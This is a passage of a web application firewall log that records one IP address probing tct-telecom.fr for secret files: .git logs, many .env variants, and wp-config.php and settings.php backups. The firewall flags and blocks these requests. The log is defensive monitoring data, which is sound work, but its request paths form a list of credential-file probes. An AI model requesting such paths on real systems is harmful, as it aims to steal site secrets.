[Tue May 12 04:50:41.471473 2026] [security2:error] [pid 1825179:tid 1825207] [client 93.123.109.165:7376] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgNr1yOh9TvizeziSggAAAEk"]
[Tue May 12 04:50:41.530085 2026] [security2:error] [pid 1730175:tid 1730185] [client 93.123.109.165:7476] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgHo6NvB9WXx5V-6hiAAAAQg"]
[Tue May 12 04:50:41.547196 2026] [security2:error] [pid 1820198:tid 1820202] [client 93.123.109.165:7418] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgM1tk6y7yBJLpJosuAAAAII"]
[Tue May 12 04:50:41.610051 2026] [security2:error] [pid 1820198:tid 1820209] [client 93.123.109.165:7500] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agKVgc1tk6y7yBJLpJosvgAAAIk"]
[Tue May 12 04:50:41.610246 2026] [security2:error] [pid 1820198:tid 1820209] [client 93.123.109.165:7500] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agKVgc1tk6y7yBJLpJosvgAAAIk"]
[Tue May 12 04:50:41.615663 2026] [security2:error] [pid 1825287:tid 1825321] [client 93.123.109.165:7522] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVgQgpmE1yW0glLdghcAAAANA"]
[Tue May 12 04:50:41.615812 2026] [security2:error] [pid 1825287:tid 1825321] [client 93.123.109.165:7522] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVgQgpmE1yW0glLdghcAAAANA"]
[Tue May 12 04:50:41.895978 2026] [security2:error] [pid 1730207:tid 1730221] [client 93.123.109.165:7314] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgDue9Sp-pIv_Bb63sQAAAUw"]
[Tue May 12 04:50:42.170712 2026] [security2:error] [pid 1825287:tid 1825321] [client 93.123.109.165:7522] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgQgpmE1yW0glLdghcAAAANA"]
[Tue May 12 04:50:42.174046 2026] [security2:error] [pid 1820198:tid 1820209] [client 93.123.109.165:7500] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgc1tk6y7yBJLpJosvgAAAIk"]
[Tue May 12 04:50:42.199739 2026] [security2:error] [pid 1730207:tid 1730223] [client 93.123.109.165:7580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.old"] [unique_id "agKVgjue9Sp-pIv_Bb63uQAAAU4"]
[Tue May 12 04:50:42.199947 2026] [security2:error] [pid 1730207:tid 1730223] [client 93.123.109.165:7580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.old"] [unique_id "agKVgjue9Sp-pIv_Bb63uQAAAU4"]
[Tue May 12 04:50:42.202177 2026] [security2:error] [pid 1730175:tid 1730182] [client 93.123.109.165:7550] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env~"] [unique_id "agKVgno6NvB9WXx5V-6hjwAAAQU"]
[Tue May 12 04:50:42.202374 2026] [security2:error] [pid 1730175:tid 1730182] [client 93.123.109.165:7550] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env~"] [unique_id "agKVgno6NvB9WXx5V-6hjwAAAQU"]
[Tue May 12 04:50:42.208744 2026] [security2:error] [pid 1825179:tid 1825214] [client 93.123.109.165:7554] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.txt"] [unique_id "agKVgtr1yOh9TvizeziSigAAAFA"]
[Tue May 12 04:50:42.208945 2026] [security2:error] [pid 1825179:tid 1825214] [client 93.123.109.165:7554] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.txt"] [unique_id "agKVgtr1yOh9TvizeziSigAAAFA"]
[Tue May 12 04:50:42.209594 2026] [security2:error] [pid 1825287:tid 1825326] [client 93.123.109.165:7576] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agKVgggpmE1yW0glLdghcwAAANQ"]
[Tue May 12 04:50:42.209783 2026] [security2:error] [pid 1825287:tid 1825326] [client 93.123.109.165:7576] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agKVgggpmE1yW0glLdghcwAAANQ"]
[Tue May 12 04:50:42.216246 2026] [security2:error] [pid 1820198:tid 1820205] [client 93.123.109.165:7572] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVgs1tk6y7yBJLpJoswgAAAIU"]
[Tue May 12 04:50:42.216383 2026] [security2:error] [pid 1730175:tid 1730181] [client 93.123.109.165:7562] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.save"] [unique_id "agKVgno6NvB9WXx5V-6hkAAAAQQ"]
[Tue May 12 04:50:42.216421 2026] [security2:error] [pid 1820198:tid 1820205] [client 93.123.109.165:7572] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVgs1tk6y7yBJLpJoswgAAAIU"]
[Tue May 12 04:50:42.216537 2026] [security2:error] [pid 1730175:tid 1730181] [client 93.123.109.165:7562] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.save"] [unique_id "agKVgno6NvB9WXx5V-6hkAAAAQQ"]
[Tue May 12 04:50:42.217037 2026] [security2:error] [pid 1808852:tid 1808863] [client 93.123.109.165:7596] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agKVghfeipD4uoG21FolIwAAAAg"]
[Tue May 12 04:50:42.217162 2026] [security2:error] [pid 1808852:tid 1808863] [client 93.123.109.165:7596] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agKVghfeipD4uoG21FolIwAAAAg"]
[Tue May 12 04:50:42.833557 2026] [security2:error] [pid 1730175:tid 1730182] [client 93.123.109.165:7550] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgno6NvB9WXx5V-6hjwAAAQU"]
[Tue May 12 04:50:42.890900 2026] [security2:error] [pid 1808852:tid 1808869] [client 93.123.109.165:7356] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgBfeipD4uoG21FolHgAAAA4"]
[Tue May 12 04:50:42.990321 2026] [security2:error] [pid 1825179:tid 1825211] [client 93.123.109.165:7394] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgNr1yOh9TvizeziShAAAAE0"]
[Tue May 12 04:50:43.084963 2026] [security2:error] [pid 1820198:tid 1820206] [client 93.123.109.165:7416] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgM1tk6y7yBJLpJosvAAAAIY"]
[Tue May 12 04:50:43.169652 2026] [security2:error] [pid 1825179:tid 1825214] [client 93.123.109.165:7554] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgtr1yOh9TvizeziSigAAAFA"]
[Tue May 12 04:50:43.227391 2026] [security2:error] [pid 1730207:tid 1730223] [client 93.123.109.165:7580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgjue9Sp-pIv_Bb63uQAAAU4"]
[Tue May 12 04:50:43.259639 2026] [security2:error] [pid 1820198:tid 1820205] [client 93.123.109.165:7572] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgs1tk6y7yBJLpJoswgAAAIU"]
[Tue May 12 04:50:43.306641 2026] [security2:error] [pid 1825287:tid 1825326] [client 93.123.109.165:7576] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgggpmE1yW0glLdghcwAAANQ"]
[Tue May 12 04:50:43.345836 2026] [security2:error] [pid 1820198:tid 1820214] [client 93.123.109.165:7324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgM1tk6y7yBJLpJosuwAAAI4"]
[Tue May 12 04:50:43.376361 2026] [security2:error] [pid 1730207:tid 1730224] [client 93.123.109.165:7392] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgDue9Sp-pIv_Bb63sgAAAU8"]
[Tue May 12 04:50:43.411399 2026] [security2:error] [pid 1808852:tid 1808863] [client 93.123.109.165:7596] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVghfeipD4uoG21FolIwAAAAg"]
[Tue May 12 04:50:43.462277 2026] [security2:error] [pid 1730175:tid 1730181] [client 93.123.109.165:7562] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVgno6NvB9WXx5V-6hkAAAAQQ"]
[Tue May 12 04:50:44.290285 2026] [security2:error] [pid 1808852:tid 1808879] [client 93.123.109.165:7744] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/local/.env"] [unique_id "agKVhBfeipD4uoG21FolLgAAABg"]
[Tue May 12 04:50:44.290460 2026] [security2:error] [pid 1808852:tid 1808879] [client 93.123.109.165:7744] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/local/.env"] [unique_id "agKVhBfeipD4uoG21FolLgAAABg"]
[Tue May 12 04:50:44.291254 2026] [security2:error] [pid 1825179:tid 1825216] [client 93.123.109.165:7700] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env#"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env#"] [unique_id "agKVhNr1yOh9TvizeziSlgAAAFI"]
[Tue May 12 04:50:44.291386 2026] [security2:error] [pid 1825179:tid 1825216] [client 93.123.109.165:7700] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env#"] [unique_id "agKVhNr1yOh9TvizeziSlgAAAFI"]
[Tue May 12 04:50:44.291451 2026] [security2:error] [pid 1730207:tid 1730233] [client 93.123.109.165:7702] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/sites/default/settings.php"] 